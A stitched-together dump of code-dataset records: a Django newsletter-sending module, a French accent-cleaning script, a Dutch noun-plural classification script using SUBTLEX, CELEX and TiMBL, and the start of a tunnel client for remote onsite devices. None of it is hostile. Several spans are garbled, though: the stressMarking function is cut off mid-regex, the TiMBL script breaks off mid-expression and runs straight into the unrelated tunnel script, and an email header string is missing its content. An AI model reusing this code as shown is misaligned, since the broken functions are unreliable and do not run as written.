= Newsletter()\r\n newsletter.__dict__ = dict(emailing.newsletter.__dict__)\r\n\r\n newsletter.subject = format_context(newsletter.subject, data)\r\n\r\n html_content = format_context(newsletter.content, data)\r\n\r\n unregister_url = newsletter.get_site_prefix() + reverse('newsletters:unregister', args=[emailing.id, contact.uuid])\r\n \r\n newsletter.content = html_content\r\n\r\n context_dict = {\r\n 'title': dehtml(newsletter.subject).replace('\\n', ''),\r\n 'newsletter': newsletter,\r\n 'by_email': True,\r\n 'MEDIA_URL': settings.MEDIA_URL,\r\n 'STATIC_URL': settings.STATIC_URL,\r\n 'SITE_PREFIX': emailing.get_domain_url_prefix(),\r\n 'subscription_type_name': emailing.subscription_type.name,\r\n 'unregister_url': unregister_url,\r\n 'contact': contact,\r\n 'emailing': emailing,\r\n }\r\n \r\n for callback in get_newsletter_context_callbacks():\r\n dictionary = callback(newsletter)\r\n if dictionary:\r\n context_dict.update(dictionary)\r\n \r\n return context_dict\r\n\r\n\r\ndef patch_emailing_html(html_text, emailing, contact):\r\n \"\"\"transform links into magic link\"\"\"\r\n links = re.findall('href=\"(?P.+?)\"', html_text)\r\n\r\n ignore_links = [\r\n reverse(\"newsletters:unregister\", args=[emailing.id, contact.uuid]),\r\n reverse(\"newsletters:view_online\", args=[emailing.id, contact.uuid]),\r\n ]\r\n\r\n for lang_tuple in settings.LANGUAGES:\r\n lang = lang_tuple[0][:2]\r\n ignore_links.append(\r\n reverse(\"newsletters:view_online_lang\", args=[emailing.id, contact.uuid, lang])\r\n )\r\n\r\n for link in links:\r\n if (not link.lower().startswith('mailto:')) and (link[0] != \"#\") and link not in ignore_links:\r\n # mailto, internal links, 'unregister' and 'view online' are not magic\r\n if len(link) < 500:\r\n\r\n magic_links = MagicLink.objects.filter(emailing=emailing, url=link)\r\n if magic_links.count() == 0:\r\n magic_link = MagicLink.objects.create(emailing=emailing, url=link)\r\n else:\r\n magic_link = magic_links[0]\r\n\r\n view_magic_link_url = reverse('newsletters:view_link', args=[magic_link.uuid, contact.uuid])\r\n magic_url = emailing.newsletter.get_site_prefix() + view_magic_link_url\r\n html_text = html_text.replace('href=\"{0}\"'.format(link), 'href=\"{0}\"'.format(magic_url))\r\n else:\r\n if 'test' not in sys.argv:\r\n logger.warning(\r\n \"magic link size is greater than 500 ({0}) : {1}\".format(len(link), link)\r\n )\r\n return html_text\r\n\r\n\r\ndef send_newsletter(emailing, max_nb):\r\n \"\"\"send newsletter\"\"\"\r\n\r\n # Clean the urls\r\n emailing.newsletter.content = make_links_absolute(\r\n emailing.newsletter.content, emailing.newsletter, site_prefix=emailing.get_domain_url_prefix()\r\n )\r\n \r\n connection = get_connection()\r\n from_email = emailing.subscription_type.from_email or settings.COOP_CMS_FROM_EMAIL\r\n emails = []\r\n \r\n contacts = list(emailing.send_to.all()[:max_nb])\r\n for contact in contacts:\r\n \r\n if contact.email:\r\n lang = emailing.lang or contact.favorite_language or settings.LANGUAGE_CODE[:2]\r\n translation.activate(lang)\r\n\r\n emailing_context = get_emailing_context(emailing, contact)\r\n emailing_context[\"LANGUAGE_CODE\"] = lang\r\n context = emailing_context\r\n the_template = get_template(emailing.newsletter.get_template_name())\r\n\r\n html_text = the_template.render(context)\r\n\r\n html_text = patch_emailing_html(html_text, emailing, contact)\r\n\r\n html_text = make_links_absolute(\r\n html_text, emailing.newsletter, site_prefix=emailing.get_domain_url_prefix()\r\n )\r\n \r\n text = dehtml(html_text)\r\n list_unsubscribe_url = emailing.get_domain_url_prefix() + reverse(\r\n \"newsletters:unregister\", args=[emailing.id, contact.uuid]\r\n )\r\n list_unsubscribe_email = getattr(settings, 'COOP_CMS_REPLY_TO', '') or from_email\r\n headers = {\r\n \"List-Unsubscribe\": \"<{0}>, \".format(\r\n list_unsubscribe_url, list_unsubscribe_email\r\n )\r\n }\r\n\r\n if getattr(settings, 'COOP_CMS_REPLY_TO', None):\r\n headers['Reply-To'] = settings.COOP_CMS_REPLY_TO\r\n\r\n email = EmailMultiAlternatives(\r\n context['title'],\r\n force_line_max_length(text),\r\n from_email,\r\n [contact.email],\r\n headers=headers\r\n )\r\n html_text = force_line_max_length(html_text, max_length_per_line=400, dont_cut_in_quotes=True)\r\n email.attach_alternative(html_text, \"text/html\")\r\n emails.append(email)\r\n\r\n # print contact, \"processed\"\r\n emailing.send_to.remove(contact)\r\n emailing.sent_to.add(contact)\r\n \r\n emailing.save()\r\n nb_sent = connection.send_messages(emails)\r\n return nb_sent or 0\r\n\r\n\r\ndef on_bounce(event_type, email, description, permanent, contact_uuid, emailing_id):\r\n \"\"\"can be called to signal soft or hard bounce\"\"\"\r\n contacts = Contact.objects.filter(email=email)\r\n\r\n # Unsubscribe emails for permanent errors\r\n if permanent:\r\n all_contacts = list(contacts)\r\n\r\n for contact in all_contacts:\r\n for subscription in contact.subscription_set.all():\r\n subscription.accept_subscription = False\r\n subscription.unsubscription_date = datetime.now()\r\n subscription.save()\r\n\r\n # Update emailing statistics\r\n if contact_uuid and emailing_id:\r\n try:\r\n contact = Contact.objects.get(uuid=contact_uuid)\r\n except Contact.DoesNotExist:\r\n contact = None\r\n\r\n try:\r\n emailing = Emailing.objects.get(id=emailing_id)\r\n except Emailing.DoesNotExist:\r\n emailing = None\r\n\r\n if contact and emailing and hasattr(emailing, event_type):\r\n getattr(emailing, event_type).add(contact)\r\n emailing.save()\r\n\r\n\r\ndef get_language():\r\n \"\"\"wrap the django get_language and make sure: we return 2 chars\"\"\"\r\n lang = django_get_language()\r\n return lang[:2]\r\n\r\n\r\ndef force_line_max_length(text, max_length_per_line=400, dont_cut_in_quotes=True):\r\n \"\"\"returns same text with end of lines inserted if lien length is greater than 400 chars\"\"\"\r\n out_text = \"\"\r\n for line in text.split(\"\\n\"):\r\n\r\n if len(line) < max_length_per_line:\r\n out_text += line + \"\\n\"\r\n else:\r\n words = []\r\n line_length = 0\r\n quotes_count = 0\r\n for word in line.split(\" \"):\r\n if word:\r\n words.append(word)\r\n quotes_count += word.count('\"')\r\n line_length += len(word) + 1\r\n in_quotes = (quotes_count % 2) == 1 # If there are not an even number we may be inside a \"\"\r\n if line_length > max_length_per_line:\r\n if not (not dont_cut_in_quotes and in_quotes):\r\n # Line is more than allowed length for a line. Enter a end line character\r\n out_line = \" \".join(words)\r\n out_text += out_line + \"\\n\"\r\n words = []\r\n line_length = 0\r\n if words:\r\n out_line = \" \".join(words)\r\n out_text += out_line + \"\\n\"\r\n\r\n return out_text[:-1] # Remove the last \"\\n\"\r\n","sub_path":"coop_cms/apps/newsletters/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"497704386","text":"mot_codé = input(str('Entrer un mot codé : '))\nmot_clear = ''\np = 97\ncompteur = 0\ndict_test = {'à':'a' , 'é':'e', 'è':'e', 'ê':'e', 'ë':'e', 'ô':'o', 'î':'i', 'ï':'i'}\nliste_ok = ['à','é','è','ê','ë','ô','î','ï']\n\n# CLEAN\n\nfor f in range (0,len(mot_codé)):\n\n for k in range (0,len(liste_ok)):\n\n if mot_codé[f] == liste_ok[k]:\n mot_clear = mot_clear + dict_test[liste_ok[k]]\n \n \n\nprint (mot_clear)\n","sub_path":"test lettre.py","file_name":"test lettre.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"457918661","text":"import sys\nimport os\nimport codecs\nimport re\nimport unicodedata\nimport timbl\nimport multiprocessing\nimport random\n\nrandom.seed(80)\n\ntens_path = \"/Volumes/tensusers/timzee/\" if sys.platform == \"darwin\" else \"/vol/tensusers/timzee/\"\noutput_path = tens_path + \"timbl_files2/\"\n\nmistakes = {\n \"S\": [\n \"agressiviteit\",\n \"hij\", # hij's\n \"rijkelui\", # rijkelui's\n \"mån\",\n \"voortgang\", # +++\n \"wéé\",\n \"àl\",\n \"ál\",\n \"afstandsbepaling\",\n \"banning\",\n \"bescherming\",\n \"bestrijding\",\n \"bewapening\",\n \"beëindiging\",\n \"conservering\",\n \"doorzetting\",\n \"functionering\",\n \"geheimhouding\",\n \"herkenning\",\n \"invoeging\",\n \"kalmering\",\n \"massavernietiging\",\n \"ontspanning\",\n \"opvoeding\",\n \"paring\",\n \"reclassering\",\n \"ringeling\",\n \"tekstverwerking\",\n \"uithouding\",\n \"uitlevering\",\n \"vermeerdering\",\n \"vernietiging\",\n \"veroudering\",\n \"verspreiding\",\n \"verwarming\",\n \"verwerking\",\n \"voedselvergiftiging\",\n \"voortplanting\",\n \"watervoorziening\",\n \"zelfbediening\",\n \"zelfverdediging\",\n \"zelfvernietiging\",\n \"aanmelding\",\n \"aanmoediging\",\n \"aantrekking\",\n \"achtervolging\",\n \"ademhaling\",\n \"afleiding\",\n \"aflevering\",\n \"afpersing\",\n \"afstoting\",\n \"bediening\",\n \"belegering\",\n \"beroving\",\n \"besturing\",\n \"betaling\",\n \"beveiliging\",\n \"bevolking\",\n \"bevoorrading\",\n \"beweging\",\n \"dreiging\",\n \"echtscheiding\",\n \"geleiding\",\n \"genezing\",\n \"herhaling\",\n \"investering\",\n \"inwijding\",\n \"lening\",\n \"mening\",\n \"misleiding\",\n \"omgeving\",\n \"ontmoeting\",\n \"ontsnapping\",\n \"ontsteking\",\n \"ontvoering\",\n \"ontwijking\",\n \"opsporing\",\n \"overleving\",\n \"programmering\",\n \"regering\",\n \"riolering\",\n \"samenzwering\",\n \"scheiding\",\n \"scheuring\",\n \"sluiting\",\n \"spanning\",\n \"straling\",\n \"toelating\",\n \"toewijding\",\n \"uitbetaling\",\n \"uitvoering\",\n \"verdediging\",\n \"verdoving\",\n \"vergelding\",\n \"verkenning\",\n \"verkiezing\",\n \"verkrachting\",\n \"verleiding\",\n \"verrassing\",\n \"verscheping\",\n \"verzekering\",\n \"waarneming\",\n \"waarschuwing\",\n \"zuivering\",\n \"zo\", # zon\n \"extreem\", # afgeleid van bijv. naamw. altijd -en\n \"aankoop\", # shouldn't be excluded? aankoopsbon can be found on google / words with prepositions only get -en ?\n \"gebed\", # +++\n \"geluid\", # +++\n \"gevecht\", # +++\n \"gezicht\", # +++\n \"grootheid\",\n \"identiteit\",\n \"illegaal\", # afgeleid van bijv. naamw. altijd -en\n \"kwaliteit\",\n \"beleefdheid\",\n \"afstand\", # +++ 5\n \"bedrijf\", # +++ 5\n \"bruid\", # +++\n \"bruiloft\", # +++\n \"dam\", # ww\n \"groep\", # ww\n \"grond\", # ww\n \"kalf\", # kalveren\n \"naam\", # +++\n \"oorlog\", # +++ 25 maar ook >25 samenstellingen\n \"persoonlijkheid\",\n \"publiek\", # +++\n \"schip\", # schepen\n \"schoonheid\",\n \"seizoen\", # +++\n \"snelheid\",\n \"toegang\", # +++\n \"universiteit\",\n \"god\", # +++\n \"cent\", # maat/eenheid\n \"karaat\", # maat/eenheid\n \"punt\" # maat/eenheid\n ],\n \"EN\": [\n \"sportster\", # different lexemes\n \"gebeuren\", # gebeuren is treated as plural\n \"demon\" # should not be excluded!\n ],\n \"OTHER\": [\n \"room\", # ww\n \"zijn\", # ww\n \"bankman\", # banklui\n \"bootsman\", # bootslui\n \"buitenman\", # buitenlui\n \"jus\", # different lexemes\n \"man\", # mannekes\n \"persman\", # perslui\n \"koren\", # komrt\n \"bos\", # ww\n \"kantoorpik\", # kantoorpikkies\n \"kop\", # koppies\n \"kwaad\", # kwaaien\n \"penny\", # pence\n \"das\", # das's\n \"zus\", # zus's\n \"den\" # different lexemes + weird singular dede dt\n ]\n}\n\n# all verbs in van dale\npossible_verbs = [\n \"vinger\", \"test\", \"film\", \"regel\", \"nagel\", \"boete\", \"tip\", \"trip\",\n \"club\", \"type\", \"sprint\", \"flirt\", \"teken\", \"keten\", \"tafel\",\n \"lade\", \"speech\", \"hint\", \"leg\", \"lobby\", \"pass\", \"pik\", \"ram\", \"stel\",\n \"stop\", \"storm\", \"toer\", \"tongen\", \"week\", \"vuur\", \"zon\", \"aanval\",\n \"barbecue\", \"kajak\", \"grieve\"\n]\n\nforbidden_words = [\n \"band\", # die muziek maken\n \"stuk\", # 4 stuks\n \"jaar\", # 2e jaars\n \"klasse\", # klasse vs. klas\n \"stand\", # leenwoord 'stents'\n \"chatbox\", # nog niet goed verwerkt\n \"gang\", # leenwoord 'gengs'\n \"zone\", # zonen is meervoud van zoon\n \"pool\", # leenwoord 'poel'\n \"strip\", # boekjes vs. strippenkaart (en ww)\n \"kinder\", # andere 'speelse' betekenis, bovendien is het meervoud hier ers vs. eren\n \"atlete\", # also exclude female forms for which the plural en is shared with male forms\n \"advocate\",\n \"echtgenote\",\n \"blind\", # afgeleid van bijv. naamw. altijd -en\n \"bal\", # 2 betekenissen\n \"bloed\", # heeft geen meervoud; ww\n \"laat\", # afgeleid van bijv. naamw. altijd -en\n \"blad\", # bladen and bladeren are different words\n \"dijbeen\", # different words\n \"dood\", # afgeleid van bijv. naamw. altijd -en\n \"gal\", # ww\n \"lomp\", # afgeleid van bijv. naamw. altijd -en\n \"neer\", # shouldn't be excluded? Neer is a village in Limburg; zij zijn Neers\n \"provinciaal\", # afgeleid van bijv. naamw. altijd -en\n \"rede\", # plural reden confusable with singular reden\n \"sar\", # ww\n \"sjiek\", # afgeleid van bijv. naamw. altijd -en\n \"sociaal\", # afgeleid van bijv. naamw. altijd -en\n \"spionne\",\n \"verstand\", # +++\n \"volbloed\", # afgeleid van bijv. naamw. altijd -en\n \"l\",\n \"pop\", # 2 meanings / ww\n \"portier\", # 2 meanings\n \"net\", # 2 meanings\n \"water\", # ww\n \"post\" # ww\n]\n\n# moeten we nog iets met woorden als 'advocate'?\n\nfrivative_voicing = {\n \"f\": \"v\",\n \"v\": \"f\",\n \"s\": \"z\",\n \"z\": \"s\",\n \"S\": \"Z\",\n \"Z\": \"S\",\n \"x\": \"G\",\n \"G\": \"x\"\n}\n\ncompound_exceptions = [\n \"a\",\n \"aal\",\n \"aan\",\n \"aar\",\n \"aard\",\n \"aarster\",\n \"aat\",\n \"ade\",\n \"age\",\n \"air\",\n \"ament\",\n \"ant\",\n \"antie\",\n \"ares\",\n \"arij\",\n \"ateur\",\n \"atie\",\n \"ator\",\n \"atorium\",\n \"atuur\",\n \"biliteit\",\n \"der\",\n \"derij\",\n \"dij\",\n \"dom\",\n \"e\",\n \"egge\",\n \"eiteit\",\n \"el\",\n \"elaar\",\n \"eling\",\n \"ement\",\n \"en\",\n \"enaar\",\n \"enares\",\n \"endom\",\n \"enier\",\n \"enij\",\n \"enis\",\n \"enist\",\n \"ent\",\n \"entie\",\n \"er\",\n \"erd\",\n \"eres\",\n \"erie\",\n \"erij\",\n \"erik\",\n \"ernij\",\n \"ertje\",\n \"es\",\n \"ess\",\n \"esse\",\n \"eteit\",\n \"etje\",\n \"eur\",\n \"euse\",\n \"foon\",\n \"heid\",\n \"iaal\",\n \"iaat\",\n \"iciteit\",\n \"ie\",\n \"ieel\",\n \"ief\",\n \"iek\",\n \"ier\",\n \"igheid\",\n \"ij\",\n \"ijn\",\n \"in\",\n \"ing\",\n \"ionair\",\n \"ionisme\",\n \"isme\",\n \"ist\",\n \"iste\",\n \"iteit\",\n \"itie\",\n \"itor\",\n \"je\",\n \"ling\",\n \"loos\",\n \"nce\",\n \"nij\",\n \"nis\",\n \"oir\",\n \"oos\",\n \"otor\",\n \"pje\",\n \"s\",\n \"schap\",\n \"se\",\n \"sel\",\n \"sie\",\n \"st\",\n \"ste\",\n \"ster\",\n \"t\",\n \"te\",\n \"tenis\",\n \"tie\",\n \"tje\",\n \"ueel\",\n \"utie\",\n \"uur\"\n]\n\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')\n\n\nprint(\"Loading SUBTLEX\")\nverb_deletion_list = []\nread_mode = False\nLemma = \"\"\nPOS = \"\"\nnoun_dict = {}\nverb_dict = {}\ncount_freq = 0\ncum_freq = 0\nwith codecs.open(tens_path + \"other/SUBTLEX-NL.master.txt\", \"r\", \"utf-8\") as f:\n for line in f:\n if read_mode:\n Wordform, SubPOS, FREQcount = unicodedata.normalize(\"NFC\", line.replace('\\x92', \"'\"))[:-1].split(\"\\t\")[2:5] # NFKD\n count_freq += int(FREQcount)\n if POS == \"N\":\n if 'ev,' in SubPOS: # include option for words like meisje\n if Wordform[-2:] == \"je\" and 'dim' in SubPOS: # for words like meisje (only dim) but will also create new entry for wagentje under wagen\n if Wordform in noun_dict:\n if 'ev' in noun_dict[Wordform]:\n noun_dict[Wordform]['ev'] += int(FREQcount)\n else:\n noun_dict[Wordform]['ev'] = int(FREQcount)\n else:\n noun_dict[Wordform] = {'ev': int(FREQcount)}\n elif Lemma == Wordform and 'basis' in SubPOS: # beesten would count towards ev without Lemma == Wordform\n if 'ev' in noun_dict[Lemma]:\n noun_dict[Lemma]['ev'] += int(FREQcount)\n else:\n noun_dict[Lemma]['ev'] = int(FREQcount)\n elif 'mv,' in SubPOS:\n if Wordform[-3:] == \"jes\" and 'dim' in SubPOS: # for words like meisjes\n if Wordform[:-1] in noun_dict:\n if \"S\" in noun_dict[Wordform[:-1]]:\n noun_dict[Wordform[:-1]][\"S\"] += int(FREQcount)\n else:\n noun_dict[Wordform[:-1]][\"S\"] = int(FREQcount)\n else:\n noun_dict[Wordform[:-1]] = {\"S\": int(FREQcount)}\n elif 'basis' in SubPOS and Lemma != Wordform:\n if Wordform[-2:] in [\"en\", \"ën\"] and (len(Wordform) - len(Lemma)) < 4: # exclude kinderen and koeien but not bessen or assurantiën\n if len(Wordform) > 3:\n if Wordform[-3] == \"i\" and Lemma[-1] != \"i\" and Wordform[-2] != \"ë\":\n pl_type = \"OTHER\"\n elif Wordform[-3] in [\"d\", \"t\"] and Lemma[-1] not in [\"d\", \"t\"] and (len(Wordform) - len(Lemma)) > 1: # exclude lijkwa - lijkwaden\n if Wordform[-4] in frivative_voicing:\n alt_fric = frivative_voicing[Wordform[-4]]\n else:\n alt_fric = \"NALALA\"\n if Lemma[-3:] in [Wordform[-4] + Wordform[-2:], alt_fric + Wordform[-2:]]: # these are verbs marked as nouns\n verb_deletion_list.append(Lemma)\n pl_type = \"\"\n elif Wordform[-3] == \"d\": # add spaden plural in spa lemma to spade lemma\n if Wordform[:-1] in noun_dict: # remaining verbs will be excluden by celex\n if \"EN\" in noun_dict[Wordform[:-1]]:\n noun_dict[Wordform[:-1]][\"EN\"] += int(FREQcount)\n else:\n noun_dict[Wordform[:-1]][\"EN\"] = int(FREQcount)\n else:\n noun_dict[Wordform[:-1]] = {'ev': 0, \"EN\": int(FREQcount)}\n pl_type = \"\"\n elif Lemma[-3:] == Wordform[-3:]:\n verb_deletion_list.append(Lemma)\n pl_type = \"\"\n else:\n pl_type = \"EN\"\n else:\n pl_type = \"EN\"\n elif Wordform[-1] == \"s\": # exclude bosjes that has been tagged as mv,basis; and crisis that is pluralized as crises\n if (len(Wordform) - len(Lemma)) == 1:\n pl_type = \"S\"\n elif (len(Wordform) - len(Lemma)) == 2 and Wordform[-2] == \"'\":\n if Wordform[-3] not in [\"s\"]: # excludes zus's but nor ex's\n pl_type = \"S\"\n else:\n pl_type = \"OTHER\"\n elif (len(Wordform) - len(Lemma)) == 2 and Wordform[-2] == \"e\": # take care of words like speeches\n pl_type = \"S\"\n elif ((len(Wordform) - len(Lemma)) == 2 or (len(Wordform) - len(Lemma)) == 3) and Wordform[-3:] == \"des\":\n if Wordform[:-1] in noun_dict: # add zijdes plural in zij lemma to zijde lemma\n if \"S\" in noun_dict[Wordform[:-1]]:\n noun_dict[Wordform[:-1]][\"S\"] += int(FREQcount)\n else:\n noun_dict[Wordform[:-1]][\"S\"] = int(FREQcount)\n else:\n noun_dict[Wordform[:-1]] = {'ev': 0, \"S\": int(FREQcount)}\n pl_type = \"\"\n else:\n if len(Wordform) > 3:\n if Wordform[-3:] == \"jes\":\n pl_type = \"\"\n elif Lemma == \"giraf\":\n pl_type = \"S\"\n else:\n pl_type = \"OTHER\" # exclude mislabeled diminuatives as plurals\n else:\n pl_type = \"OTHER\"\n else: # add re restriction so that strategi n isn't a plural\n if re.search(r'[a-z][a-z]', Wordform[-2:]):\n pl_type = \"OTHER\"\n if pl_type in noun_dict[Lemma]: # Wordform later vervangen door pl_type: 'en', 's', 'other'\n noun_dict[Lemma][pl_type] += int(FREQcount)\n else:\n if pl_type != \"\":\n noun_dict[Lemma][pl_type] = int(FREQcount)\n elif POS == \"WW\": # let's ignore past tense for now\n if SubPOS in [\"pv,tgw,mv\"]:\n if Wordform == Lemma:\n verb_dict[Lemma] += int(FREQcount)\n if count_freq == cum_freq:\n read_mode = False\n else:\n Lemma, POS, Wordform, SubPOS, FREQcount = unicodedata.normalize(\"NFC\", line.replace('\\x92', \"'\"))[:-1].split(\"\\t\")[:5]\n# if Lemma not in [\"@\", \"%\", \"'\"] and POS == \"N\":\n if not re.search(r\"[0-9@%'., ]\", Lemma) and POS == \"N\":\n read_mode = True\n if Lemma == \"hersenen\":\n Lemma = \"hersen\"\n noun_dict[Lemma] = {'ev': 0}\n elif Lemma == \"hersens\":\n Lemma = \"hersen\"\n elif Lemma == \"ideeën\":\n Lemma = \"idee\"\n else:\n if Lemma not in noun_dict:\n noun_dict[Lemma] = {'ev': 0}\n cum_freq = int(FREQcount)\n count_freq = 0\n elif not re.search(r\"[0-9@%'.?, ]\", Lemma) and re.search(r\"([eao]i|[qwrtpsdfghjklzxcvbnm])en$\", Lemma) and POS == \"WW\" and len(Lemma) > 3:\n read_mode = True\n if Lemma not in verb_dict:\n verb_dict[Lemma] = 0\n cum_freq = int(FREQcount)\n count_freq = 0\n else:\n continue\n\n# remove mistakes\nfor lab in mistakes:\n for w in mistakes[lab]:\n if lab in noun_dict[w]:\n del noun_dict[w][lab]\n else:\n print(w)\n\n# remove verbs\nfor v in list(set(verb_deletion_list)):\n del noun_dict[v]\n\nnoun_dict = {k: noun_dict[k] for k in noun_dict if len(noun_dict[k]) > 1}\n\n# remove forbidden words\nfor w in forbidden_words:\n if w in noun_dict:\n del noun_dict[w]\n\nverb_dict = {k: verb_dict[k] for k in verb_dict if verb_dict[k] > 0}\n\nprint(\"Loading CELEX\")\ncelex = {}\ncelex_verbs = {}\nwith codecs.open(tens_path + \"other/DML.CD\", \"r\", \"utf-8\") as f:\n DML = f.readlines()\n\nwith codecs.open(tens_path + \"other/DPL.CD\", \"r\", \"utf-8\") as f: # do we need DPW so 'huisje' is actually matched in CELEX?\n DPL = f.readlines()\n\nDMW = {}\nwith codecs.open(tens_path + \"other/DMW.CD\", \"r\", \"utf-8\") as f: # We need it to determine wordclass, including diminuatives\n for line in f:\n l_list_dmw = line[:-1].split(\"\\\\\")\n dmw_word = l_list_dmw[1]\n dmw_id = l_list_dmw[3]\n word_type = l_list_dmw[4]\n if dmw_word in DMW:\n if dmw_id in DMW[dmw_word]:\n DMW[dmw_word][dmw_id].append(word_type)\n else:\n DMW[dmw_word][dmw_id] = [word_type]\n else:\n DMW[dmw_word] = {dmw_id: [word_type]}\n\n\nfor line_num, line in enumerate(DML, 0):\n l_list = line[:-1].split(\"\\\\\")\n word = l_list[1]\n lem_id = l_list[0]\n word_type = l_list[12]\n word_type = word_type[-2] if len(word_type) > 2 else \"\"\n if word not in celex:\n if word_type == \"\":\n if word in DMW:\n if lem_id in DMW[word]:\n if (\"de\" in DMW[word][lem_id]) or (\"e\" in DMW[word][lem_id]):\n word_type = \"N\"\n elif \"i\" in DMW[word][lem_id]:\n word_type = \"V\"\n else:\n word_type = \"\"\n# word_type = \"N\" if (\"de\" in DMW[word][lem_id]) or (\"e\" in DMW[word][lem_id]) else \"\"\n if word_type == \"N\":\n l_list_dpl = DPL[line_num][:-1].split(\"\\\\\")\n assert word == l_list_dpl[1]\n phon = l_list_dpl[3] # 3 instead of 6 so 'apenootje' gets the correct features\n parse = l_list[-8] # use different parse for words with different parses\n # if len(parse) > 0: # exclude words for which compounding information is not present, or maybe not do this because it excludes a lot of words..\n compound = \"+\" in parse # check for compounds\n # extract final part of compound using DML\n if compound:\n fin_word = parse.split(\"+\")[-1]\n compound = fin_word[:]\n if len(phon) > 2:\n celex[word] = {\"phones\": phon, \"compound\": compound}\n elif word_type == \"V\": # and add_verbs:\n l_list_dpl = DPL[line_num][:-1].split(\"\\\\\")\n assert word == l_list_dpl[1]\n phon = l_list_dpl[6]\n parse = l_list[-8]\n compound = \"+\" in parse\n if compound:\n fin_word = parse.split(\"+\")[-1]\n compound = fin_word[:]\n if len(phon) > 2:\n celex_verbs[word] = {\"phones\": phon, \"compound\": compound}\n\n\ndef stressMarking(compound, cel):\n num_syl_in_word = len(re.findall(r'[euoa]+(?=[^euioa]*)|(?= 0 else abs(extra_syls) * [\"=\"] + syllables\n features = []\n stress = []\n for syl in syllables:\n if syl == \"=\":\n features.extend([\"=\", \"=\", \"=\"])\n stress.append(\"-\")\n else:\n # check stress\n if syl[0] == \"'\":\n stress.append(\"+\")\n syl = syl[1:]\n else:\n stress.append(\"-\")\n # find onset, nucleus, and coda\n onset = re.search(r'^[{}]+'.format(\"\".join(medeklinkers)), syl)\n onset = onset.group() if onset else \"=\"\n nucleus = re.search(r'[{}]+'.format(\"\".join(klinkers)), syl)\n nucleus = nucleus.group() if nucleus else \"=\"\n coda = re.search(r\"[{}]+$\".format(\"\".join(medeklinkers)), syl)\n coda = coda.group() if coda else \"=\"\n features.extend([onset, nucleus, coda])\n return features, stress\n\n\n# up until here everything everything can be global (for multiprocessing)\ndef runTimbl(instances, metric, shared_lemmas, type_merge, num_syl, nn_k, dist_weight, add_var, add_invar, add_verbs, verb_class):\n add_var_lab = \"_both\" if add_var and add_invar else \"_invar\" if add_invar and not add_var else \"_var\"\n add_verb_lab = \"_\" + verb_class if add_verbs else \"\"\n type_merge_lab = \"_merge\" if instances == \"type\" and type_merge else \"\"\n shrd_lab = \"\" if shared_lemmas else \"_noshare\"\n model_name = \"pl_{}_{}{}_{}syl_k{}_{}{}{}{}\".format(instances, metric, type_merge_lab, str(num_syl), str(nn_k), dist_weight, add_var_lab, shrd_lab, add_verb_lab)\n classifier = timbl.TimblClassifier(model_name + \".master\", \"-m{}:I1 -k {} -d {} -G 0\".format(metric, nn_k, dist_weight), dist=True) # give unique name for multiprocessing\n\n dataset_invar2 = dataset_invar.copy()\n if not shared_lemmas: # remove words from invar that share the final lemma with a word in var\n del_nouns = []\n for w in dataset_var:\n if w in invar_compounds: # e.g. infectieziekte in invar; ziekte in var\n for n in invar_compounds[w]:\n if n in dataset_invar2:\n del_nouns.append(n)\n del dataset_invar2[n]\n w_str = strip_accents(w)\n if \"compound\" in celex[w_str]:\n if celex[w_str][\"compound\"] in invar_compounds: # e.g. infectieziekte in invar; huidziekte in var\n for m in invar_compounds[celex[w_str][\"compound\"]]:\n if m in dataset_invar2:\n del_nouns.append(m)\n del dataset_invar2[m]\n if celex[w_str][\"compound\"] in dataset_invar2: # e.g. juf in invar; schooljuf in var\n del_nouns.append(celex[w_str][\"compound\"])\n del dataset_invar2[celex[w_str][\"compound\"]]\n\n invar_strings = []\n merge_feats = []\n for wrd in dataset_invar2:\n feat, strs = getFeatures(wrd, dataset_invar2, num_syl)\n pl_class = dataset_invar2[wrd]['class']\n compound_word_syls = len(re.findall(r'[euoa]+(?=[^euioa]*)|(? 1:\n # There was at least one ':' in the RDV server name, assume it is the TCP port number\n rdv_server_host = args.rdv_server.split(':')[0]\n rdv_server_tcp_port = int(args.rdv_server.split(':')[1])\n \n master_dev = MasterDev(username=username, logger=logger, rdv_server_host=rdv_server_host, rdv_server_tcp_port=rdv_server_tcp_port)\n \n msg = 'Connecting to RDV server'\n if args.with_stunnel:\n msg += ' over an SSL tunnel'\n else:\n msg += ' directly over SSH (' + str(master_dev.get_rdv_server_host()) + ')'\n msg += ' as user account \"' + username + '\"'\n logger.info(msg)\n master_dev.rdv_server_connect(using_stunnel=args.with_stunnel)\n \n if args.list_onsite:\n print('Currently available onsite devices:')\n total_onsite_devs = 0\n for onsite_dev in master_dev.get_online_onsite_dev():\n total_onsite_devs += 1\n print(onsite_dev)\n if total_onsite_devs == 0:\n print('No onsite device currently available')\n else:\n print('Total: ' + str(total_onsite_devs))\n if args.onsite is None:\n exit(0) # List only mode, do not connect\n \n if args.onsite is None:\n print(progname + ': Error: --onsite argument is mandatory if --list-onsite is not used', file=sys.stderr)\n exit(1)\n else:\n remote_onsite=args.onsite # The remote onsite dev to which we want to connect\n \n # Prepare a threading event to be set when the session drops. Setting this event will terminate this script\n termination_event = threading.Event()\n termination_event.clear()\n \n logger.info('Connecting to onsite ' + remote_onsite)\n unavail_onsite_msg = 'Could not connect to ' + remote_onsite + '. It is not connected (yet). Waiting'\n while True:\n onsite_dev_list = master_dev.get_online_onsite_dev()\n if remote_onsite in onsite_dev_list: # We saw our onsite dev available, continue\n break\n else:\n if not unavail_onsite_msg is None:\n logger.warning(unavail_onsite_msg)\n unavail_onsite_msg = None\n \n time.sleep(10)\n \n master_dev.send_lan_ip_address_for_iface('eth0')\n master_dev.run_set_tunnel_mode(args.tunnel_mode)\n #master_dev.run_set_tunnelling_dev_uplink_type('lan')\n logger.info('Selecting onsite dev ' + remote_onsite + ' for this session')\n master_dev.run_connect_to_onsite_dev(remote_onsite) # Now connect to this remote\n \n # Sanity check\n if master_dev.run_get_role() != 'master':\n logger.error('Tundev shell returns a role that does not match this script (master)')\n raise Exception('RoleMismatch')\n \n tunnel_mode = master_dev.run_get_tunnel_mode()\n \n locally_redirected_vtun_server_port = 5000\n \n extremity_if = None\n event_secondary_if_down = threading.Event()\n event_secondary_if_down.clear()\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) # Use Glib's 